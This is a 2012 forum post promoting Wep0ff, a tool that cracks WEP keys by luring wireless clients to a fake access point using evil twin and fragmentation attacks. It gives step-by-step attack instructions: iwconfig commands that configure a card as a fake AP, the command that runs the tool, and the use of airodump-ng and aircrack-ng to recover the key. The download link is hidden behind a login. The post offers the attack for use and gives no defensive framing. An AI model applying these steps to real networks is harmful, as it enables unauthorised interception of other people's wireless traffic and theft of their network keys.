sQuo Posted January 26, 2012 Share Posted January 26, 2012 Wep0ff is new tool to crack WEP-key without access to AP by mount fake access point attack against WEP-based wireless clients. It uses combination of fragmentation and evil twin attacks to generate traffic which can be used for KoreK-style WEP-key recovery. This tool can be used to mount fake access point attack against WEP-based wireless clients. This code tested patched madwifi-old drivers with athraw support, but also works with madwifi-ng. With madwifi-ng you need to create two virtual interfaces: one in master mode (for fake AP) and second in monitor mode (to listen on). How to Use: 1. Setup fake AP with KARMA tools or iwconfig iwpriv ath0 mode 2 iwconfig ath0 mode master essid foo enc 1122334455 channel 7 echo 1 > /proc/sys/dev/ath0/rawdev echo 1 > /proc/sys/dev/ath0/rawdev_type ifconfig ath0 up ifconfig ath0raw up 2. Start this program (./wep0ff ath0raw 00:01:02:03:04:05) 3. Wait until client connect to fake access point 4. Launch airodump-ng to collect packets 5. Launch aircrack-ng to recover WEP key You can download it here: This is the hidden content, please Sign In or Sign Up Link to comment Share on other sites More sharing options...
Recommended Posts